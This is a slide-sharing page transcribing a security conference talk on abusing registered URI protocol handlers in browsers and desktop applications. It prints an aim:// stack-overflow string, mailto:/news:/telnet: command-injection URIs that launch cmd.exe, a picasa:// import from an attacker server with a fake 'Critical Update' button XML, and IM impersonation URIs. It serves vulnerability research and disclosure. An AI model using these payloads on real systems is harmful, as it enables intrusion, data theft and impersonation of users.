uri use and abuse
play

URI Use and Abuse New and Improved with Mac Pwnage and Mobile - PowerPoint PPT Presentation

Feb 11, 2024 •325 likes •841 views

URI Use and Abuse New and Improved with Mac Pwnage and Mobile Attack Vectors!!! Contributing Authors Nathan McFeters Senior Security Analyst Ernst & Young Advanced Security Center, Chicago Billy Kim Rios Senior

  1. URI Use and Abuse New and Improved with Mac Pwnage and Mobile Attack Vectors!!!

  2. Contributing Authors • Nathan McFeters – Senior Security Analyst – Ernst & Young Advanced Security Center, Chicago • Billy Kim Rios – Senior Researcher – Microsoft, Seattle • Rob Carter – Security Analyst – Ernst & Young Advanced Security Center, Houston

  3. URIs – An Overview • Generic – http://, ftp://, telnet://, etc. • What else is registered? – aim://, firefoxurl://, picasa://, itms://, etc.

  4. URIs – Interaction With Browsers • Developers create URI hooks in the registry for their applications • Once registered they can be accessed and interacted with through the browser • XSS can play too!

  5. URI Discovery – Where and What? • RFC 4395 defines an IANA-maintained registry of URI Schemes • W3C maintains *retired* schemes • AHA! The registry! Enter DUH!

  6. DUH Tool – Sample Output

  7. Attacking URIs – Attack Scope • URIs link to applications • Applications are vulnerable to code flaws and functionality abuse • URIs can be accessed by XSS exposures

  8. Stack Overflow in Trillian’s aim.dll Through the aim:// URI • The aim:// URI is associated with the command ‘Rundll32.exe “C:\Program Files\Trillian\plugins\aim.dll”, aim_util_urlHandler url=”%1” ini="c:\program files\trillian\users \default\cache\pending_aim.ini”’.

  9. Stack Overflow in Trillian’s aim.dll Through the aim:// URI • Attacker controls the value that is put into aim_util_urlHandler through the URI, such as aim://MyURL. • Value is copied without bounds checking leading to a stack overflow

  10. Stack Overflow in Trillian’s aim.dll Through the aim:// URI Example: • aim:///#1111111/11111111111111111111111111111111111 1111111111111111111111111122222222222222222222222 2222222222222222222222222222222222222233333333333 3333333333333333333333333333333333333333333333333 3444444444444444444444444444444444444444444444444 4444444444444555555555555555555555555555555555555 55555555555555555555555556666666AAAABBBB6666666 6666666666666666666666666666666666666666666666666 6666677777777777777777777777777777777777777777777 7777777777777777788888888888888888888888888888888 8888888888888888888888888888899999999999999999999 9999999999999999999999999999999999999999900000000 0000000000000000000000000000000000000000000000000 0000

  11. Stack Overflow Caught By OllyDbg

  12. Control of Pointer to Next SEH Record and SE Handler

  13. Command Injection in Call to Trillian’s aim.dll Through XSS • The command associated with aim:// takes two arguments, “URL” (which we control) and “ini”, which is set by default to C:\Program Files\Trillian\users \default\cache \pending_aim.ini.

  14. Command Injection in Call to Trillian’s aim.dll Through XSS • Attacker can inject a “ to close off the “uri” command line argument and can then inject a new “ini” parameter. • The “ini” parameter is used to specify a file location to write startup data to. • We can control some of that startup data through the aim:// URI.

  15. Command Injection in Call to Trillian’s aim.dll Through XSS

  16. Bug in Microsoft’s IFrame.dll Through res:// URI (MS07-035) • The res:// URI is a predefined pluggable protocol in Microsoft that allows content like images, html, xsl, etc. to be pulled from DLLs or executables. Ex: res://ieframe.dll/info_48.png • You have seen this, you just might not know it, if you have a 404 page or common error pages in IE, you’ll see a blue ?, this is loaded using res://.

  17. Bug in Microsoft’s IFrame.dll Through res:// URI (MS07-035) • Playing with the res:// URI, it was discovered the browser would crash if the following URI was accessed: res://ieframe.dll/#111111/1 • Further testing led to res://ieframe.dll/#111111AAAAAA… (long string of A’s)…AA/1, which caused the windows dumprep.exe to kick-up.

  18. Bug in Microsoft’s IFrame.dll Through res:// URI (MS07-035)

  19. Bug in Microsoft’s IFrame.dll Through res:// URI (MS07-035)

  20. Cross Browser Scripting – IE pwns Firefox and Netscape Navigator • Firefox and Netscape Navigator 9 register URIs to be “compliant with Windows Vista”. • These URIs (“firefoxurl” and “navigatorurl”) are vulnerable to command injection when called from IE. • Gecko based browsers accept the –chrome argument, and we can inject this to supply arbitrary JavaScript code that allows us to spawn a command prompt.

  21. Cross Browser Scripting – IE pwns Firefox and Netscape Navigator

  22. Command Injection in Firefox and All Gecko Based Browsers, Microsoft Outlook, etc. • This is actually caused by a flaw in Microsoft’s shell32.dll file on non-Vista machines. • Was fixed for Firefox by Mozilla Sec. Team for Firefox in version 2.0.0.7.

  23. Command Injection in Firefox and All Gecko Based Browsers, Microsoft Outlook, etc.

  24. Command Injection in Firefox and All Gecko Based Browsers, Microsoft Outlook, etc. • The following URIs will cause a command injection: – mailto:%00%00../../../../../../windows/system32/cmd".exe ../../. ./../../../../../windows/system32/calc.exe " - " blah.bat – nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../ ../../../../../windows/system32/calc.exe " - " blah.bat – news:%00%00../../../../../../windows/system32/cmd".exe ../../.. /../../../../../windows/system32/calc.exe " - " blah.bat – snews:%00%00../../../../../../windows/system32/cmd".exe ../../ ../../../../../../windows/system32/calc.exe " - " blah.bat – telnet:%00%00../../../../../../windows/system32/cmd".exe ../../.. /../../../../../windows/system32/calc.exe " - " blah.bat

  25. Trust-based Applet Attack against Google’s Picasa (T-bAG) • picasa://importbutton?url= http://shadyshady.com/evilbutton.xml • Yep, that’s right it imports a remote XML description of a button • If that button is loaded from OUR server and clicked we get to see all those naughty pictures of your girlfriend

  26. The Plan – Ghetto Whiteboard Edition

  27. The Plan – Ghetto Diagram Edition The Hacker YouTube, MySpace Hacker Plants XSS Victim’s Web Browser Attack Server

  28. Trust-based Applet Attack against Google’s Picasa (T-bAG) The button.pbf file looks like so: • <?xml version="1.0" encoding="utf-8" ?> <buttons format="1" version="1"> <button id="custombutton/evilbutton" type="dynamic"> <icon name="outputlayout/poster_icon" src="runtime" /> <label>Critical Update Available</label> <tooltip>Click to Download Critical Update</tooltip> <action verb="hybrid"> <param name="url" value="http://natemcfeters.com/pwn.py" /> </action> </button> </buttons>

  29. Trust-based Applet Attack against Google’s Picasa (T-bAG) • When the button is clicked, Picasa starts up its own instance of Internet Explorer to open up whatever is at http://natemcfeters.com/pwn.py • The real interesting thing is what Picasa SENDS :

  30. What’s Sent by Picasa?!

  31. Why Flash? • We chose Flash to exploit our client- side attack vector for three reasons: – 1. It is vulnerable to DNS Rebinding attacks. – 2. If a valid crossdomain.xml file is present we can connect back to our attack server. – 3. As of Actionscript 3.0 we now have access to a Socket class that can read and write raw binary data.

  32. Trust-based Applet Attack against Google’s Picasa (T-bAG)

  33. PDP’s PDF Sploit • One of the URI/Protocol handler attack vectors that gained a lot of publicity was the PDF based attack by PDP • This was based off of our same mailto: command injection, and in fact, the version in the wild also uses this

  34. Stupid IM Trick • I want to talk to your girlfriend as if I’m you! – ymsgr:sendim?yourGirlFriend&m=I+think+we+sho uld+break+up…+sorry+but+its+you+not+me – gtalk:chat?jid=Pwn1ch1wa@gmail.com – gtalk:call?jid=Pwn1ch1wa@gmail.com – gtalk:voicemail?jid=Pwn1ch1wa@gmail.com – aim:goim?screenname=yourGirlFriend&m=I+really +think+you’d+be+happier+with+Nate – skype, Gadu-Gadu, Jabber, etc.

  35. Yep, They’re Stupid, but… • Aside from stealing your girlfriend and causing a Denial of Service on you… • What if you could XSS a lot of people from one page and then force their browsers to loop through sending as many of these messages as possible? • DDoS on all chat providers anyone?

  36. What’s Next? *Nix Anyone? • Why oh why is no one talking about *Nix yet. Why? No registry… or is there? AHA! DUH4Linux.sh! • #!/bin/bash gconftool-2 /desktop/gnome/url-handlers --all-dirs | cut -- delimiter=/ -f 5 | while read line; do { gconftool-2 /desktop/gnome/url-handlers/$line -a | grep - i 'command' | cut --delimiter== -f 2 | while read line2; do { echo "$line $line2" } done } done

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

How do I recognize child abuse? Physical Abuse 1. Physical Neglect 2. 3. Sexual Abuse 4.

How do I recognize child abuse? Physical Abuse 1. Physical Neglect 2. 3. Sexual Abuse 4.

Child Abuse, Bullying and Strategies You Can Use to Protect Yourself How do I recognize child abuse? Physical Abuse 1. Physical Neglect 2. 3. Sexual Abuse 4. Emotional Maltreatment 1 Physical Abuse Physical indicators Behavioral indicators

737 views • 7 slides
Hi Histor ory of of Elder Elder Abuse Abuse Legisla Legislation ion Fe Federal Federal

Hi Histor ory of of Elder Elder Abuse Abuse Legisla Legislation ion Fe Federal Federal

12/12/2019 Na Nati tional onal Gui Guidel elines ines fo for Fi Financial nancial Ins Instit itutio ions ns: Wo Working to togeth gether er to to Pro Protect Ol Older der Pe Persons fr from Fi Financial nancial Abuse Abuse Joe

409 views • 8 slides
Economic abuse What Research Tells Us Dr Nicola Sharp-Jeffs Overview What is economic

Economic abuse What Research Tells Us Dr Nicola Sharp-Jeffs Overview What is economic

Economic abuse What Research Tells Us Dr Nicola Sharp-Jeffs Overview What is economic abuse? How is it different to financial abuse ? Economic abuse and coercive control Economic abuse post-separation Prevalence data for UK and

326 views • 31 slides
Psychological Abuse NCEA Elder Abuse Presentation: Psychological Abuse www.ncea.aoa.gov 1

Psychological Abuse NCEA Elder Abuse Presentation: Psychological Abuse www.ncea.aoa.gov 1

An Introduction to Elder Abuse for Professionals: Psychological Abuse NCEA Elder Abuse Presentation: Psychological Abuse www.ncea.aoa.gov 1 NCEA Elder Abuse Presentation: Psychological Abuse www.ncea.aoa.gov 2 Learning Objectives At

839 views • 28 slides
ICANN61 Tech Day IDN Abuse M e r i k e K a e o ( p r e s e n t i n g ) R e s e a r c h b

ICANN61 Tech Day IDN Abuse M e r i k e K a e o ( p r e s e n t i n g ) R e s e a r c h b

ICANN61 Tech Day IDN Abuse M e r i k e K a e o ( p r e s e n t i n g ) R e s e a r c h b y : M i k e S c h i f f m a n , S t e p h e n W a t t FARSIGHT SECURITY Mo#va#on Lots of Data To Play With Shed Light on Domain Abuse

336 views • 16 slides
Consolidated Substance Consolidated Substance Abuse Counseling Abuse Counseling Center Center

Consolidated Substance Consolidated Substance Abuse Counseling Abuse Counseling Center Center

Consolidated Substance Consolidated Substance Abuse Counseling Abuse Counseling Center Center (CSACC) (CSACC) 13 FEB 2014 MCB CAMP PENDLETON, CA Marine Corps Substance Abuse Program DoD Instruction (DoDI) 1015.10 The minimum drinking

395 views • 6 slides
Domestic Violence The Cycle Abuse: Guilt: Excuses Normal Behavior Fantasy/ Honey-moon phase

Domestic Violence The Cycle Abuse: Guilt: Excuses Normal Behavior Fantasy/ Honey-moon phase

Domestic Violence The Cycle Abuse: Guilt: Excuses Normal Behavior Fantasy/ Honey-moon phase Tension build-up/ set-up Back to abuse Abuse abuse is psychological and physical it can leave deep and lasting scars No one should live in fear of the

470 views • 17 slides
INHALANT ABUSE And What To Do About It What Is Inhalant Abuse? Deliberate inhalation of fumes,

INHALANT ABUSE And What To Do About It What Is Inhalant Abuse? Deliberate inhalation of fumes,

INHALANT ABUSE And What To Do About It What Is Inhalant Abuse? Deliberate inhalation of fumes, vapors or gases to get high Sniffing, Huffing, or Dusting More than 1,400 household products High of choice

756 views • 51 slides
Patterns of Abuse Domestic Abuse: A form of oppression

Patterns of Abuse Domestic Abuse: A form of oppression

Patterns of Abuse Domestic Abuse: A form of oppression in which a person uses certain behavior patterns to control their intimate partner.

387 views • 19 slides
Resources on Substance Use and Abuse in Teens GENERAL INFORMATION ABOUT SUBSTANCE ABUSE AND

Resources on Substance Use and Abuse in Teens GENERAL INFORMATION ABOUT SUBSTANCE ABUSE AND

Resources on Substance Use and Abuse in Teens GENERAL INFORMATION ABOUT SUBSTANCE ABUSE AND PREVENTION: General information and materials from programs about substance abuse. Parentengagementnetwork.org Speak Now Colorado - Age appropriate

165 views • 4 slides
Opioid Abuse: What it means to Medicine Bruce Bonanno, MD, FACEP No declarations

Opioid Abuse: What it means to Medicine Bruce Bonanno, MD, FACEP No declarations

Opioid Abuse: What it means to Medicine Bruce Bonanno, MD, FACEP No declarations NJACEP President 201011 NJ PMP instituted Prescription Drug Abuse Campaign: ACEP March 20122015 NJACEP Opiate Abuse Task Force April

1.27k views • 88 slides
Medicare ACOs: Fraud and Abuse Perspectives This webinar is brought to you by the Fraud &amp;

Medicare ACOs: Fraud and Abuse Perspectives This webinar is brought to you by the Fraud &amp;

Medicare ACOs: Fraud and Abuse Perspectives This webinar is brought to you by the Fraud &amp; Abuse (Fraud) Practice Group and the Accountable Care Organization Task Force (ACO TF) (a joint endeavor of the Antitrust; Fraud and Abuse; Health

408 views • 26 slides
Prescription Drug Abuse Is Drug Abuse About Rx Drug Abuse What is prescription (Rx) drug

Prescription Drug Abuse Is Drug Abuse About Rx Drug Abuse What is prescription (Rx) drug

Prescription Drug Abuse Is Drug Abuse About Rx Drug Abuse What is prescription (Rx) drug abuse? Prescription drug abuse is when someone takes a medication inappropriately, such as: Without a prescription In a way other than as

508 views • 25 slides
COVID-19 Related Scams &amp; Elder Abuse Shawna Reeves, MSW Director of Elder Abuse Prevention

COVID-19 Related Scams &amp; Elder Abuse Shawna Reeves, MSW Director of Elder Abuse Prevention

COVID-19 Related Scams &amp; Elder Abuse Shawna Reeves, MSW Director of Elder Abuse Prevention 415-750-4188 sreeves@ioaging.org 101 Montgomery Street, Suite 2150 San Francisco, CA 94104 800.445.8106 | 415.434.3388 www.caregiver.org Laying

586 views • 13 slides
What is Elder Financial Abuse? Elder financial abuse is the illegal Elder financial abuse is the

What is Elder Financial Abuse? Elder financial abuse is the illegal Elder financial abuse is the

BROKEN TRUST: Elders, Families, and Finances Pamela. B. Teaster, Karen A. Roberto, John N. Migliaccio, Robert Blancato, Susan Lawrence, &amp; Brandy Renee McCann Association for Gerontology in Higher Education March 2011 1 What is Elder

386 views • 16 slides
Computational Ethics for NLP Lecture 10: Ethics in Conversational Agents Abuse, hate-speech, and

Computational Ethics for NLP Lecture 10: Ethics in Conversational Agents Abuse, hate-speech, and

Computational Ethics for NLP Lecture 10: Ethics in Conversational Agents Abuse, hate-speech, and offensive language Shrimai Prabhumoye sprabhum@cs Lecture plan 1. Motivation: why abuse detection? 2. Why do we care? 3. Abuse in Chatbots a.

507 views • 32 slides
Market Performance and Planning Forum August 29, 2018 ISO PUBLIC ISO PUBLIC Objective: Enable

Market Performance and Planning Forum August 29, 2018 ISO PUBLIC ISO PUBLIC Objective: Enable

Market Performance and Planning Forum August 29, 2018 ISO PUBLIC ISO PUBLIC Objective: Enable dialogue on implementation planning and market performance issues Review key market performance topics Share updates to 2018 release plans,

1.35k views • 104 slides
Open Service Compendium 13/05/2014| Service-centric Networking | Internet of Services Project 2015

Open Service Compendium 13/05/2014| Service-centric Networking | Internet of Services Project 2015

Open Service Compendium 13/05/2014| Service-centric Networking | Internet of Services Project 2015 Andromachi Vouimta, Julien Bergner, Jonas Anschlag, Ceren Sanli, Najeefa Nikhat Choudhury, Mehdi Ben Fadhel, Henning Vogt, Kamran Ali Agenda 1.

452 views • 22 slides
PT PURADELTA LESTARI TBK MANAGEMENT PRESENTATION JAN MAR 2017 UNAUDITED RESULTS APRIL 2017

PT PURADELTA LESTARI TBK MANAGEMENT PRESENTATION JAN MAR 2017 UNAUDITED RESULTS APRIL 2017

PT PURADELTA LESTARI TBK MANAGEMENT PRESENTATION JAN MAR 2017 UNAUDITED RESULTS APRIL 2017 STRICTLY CONFIDENTIAL DISCLAIMER THIS PRESENTATION IS FOR INFORMATION PURPOSES ONLY. IT IS NOT, IS NOT INTENDED TO BE, AND SHALL NOT BE CONSTRUED AS,

313 views • 29 slides
EL PASO MASS TRANSIT DEPARTMENT TRANSIT BOARD ACTION DATE REFERENCE NO. SUBJECT: ITEM NO:

EL PASO MASS TRANSIT DEPARTMENT TRANSIT BOARD ACTION DATE REFERENCE NO. SUBJECT: ITEM NO:

EL PASO MASS TRANSIT DEPARTMENT TRANSIT BOARD ACTION DATE REFERENCE NO. SUBJECT: ITEM NO: Presentation and discussion on Sun Metros 05 -10-11 11 43 7 FY 2011-2012 Marketing Plan BACKGROUND: Presentation and discussion on Sun

163 views • 14 slides
Web Uygulama Gvenliinde Doru Bilinen Yanllar ! Deniz evik Gvenlik Testleri

Web Uygulama Gvenliinde Doru Bilinen Yanllar ! Deniz evik Gvenlik Testleri

www.biznet.com.tr Web Uygulama Gvenliinde Doru Bilinen Yanllar ! Deniz evik Gvenlik Testleri Yneticisi deniz.cevik@biznet.com.tr Gndem Ksaca Biznet Web Uygulama Mimarisine Ksa Bir Bak Uygulama Gvenlii

302 views • 26 slides
Interaktiver Lernpfad Grundwissen Optik 7.Jahrgangsstufe Natur und Technik Johannes Almer 25.

Interaktiver Lernpfad Grundwissen Optik 7.Jahrgangsstufe Natur und Technik Johannes Almer 25.

Interaktiver Lernpfad Grundwissen Optik 7.Jahrgangsstufe Natur und Technik Johannes Almer 25. Mrz 2010 Johannes Almer () Optik GW 7. JGST 25. Mrz 2010 1 / 13 Gliederung Motivation 1 Interaktive Mglichkeiten 2 Evaluation 3

314 views • 27 slides
Mensch-Maschine-Interaktion 2 bung 5 (12./14./15. Juni 2007) Arnd Vitzthum -

Mensch-Maschine-Interaktion 2 bung 5 (12./14./15. Juni 2007) Arnd Vitzthum -

Mensch-Maschine-Interaktion 2 bung 5 (12./14./15. Juni 2007) Arnd Vitzthum - arnd.vitzthum@ifi.lmu.de Amalienstr. 17, Raum 501 Dominic Bremer - bremer@cip.ifi.lmu.de Java ME Overview (I) Java ME slim Java for mobile devices

197 views • 15 slides
Integration to Fuel Truck Flowmeter Register via Java Native Interface on Windows Platforms

Integration to Fuel Truck Flowmeter Register via Java Native Interface on Windows Platforms

Integration to Fuel Truck Flowmeter Register via Java Native Interface on Windows Platforms Team: Dec13-07 Team Members Bryce Kvindlog Yaze Wang Jason Kaiser Carl Garrett Advisor Professor Gurpur Prabhu Client Oakland Corporation

325 views • 19 slides

More recommend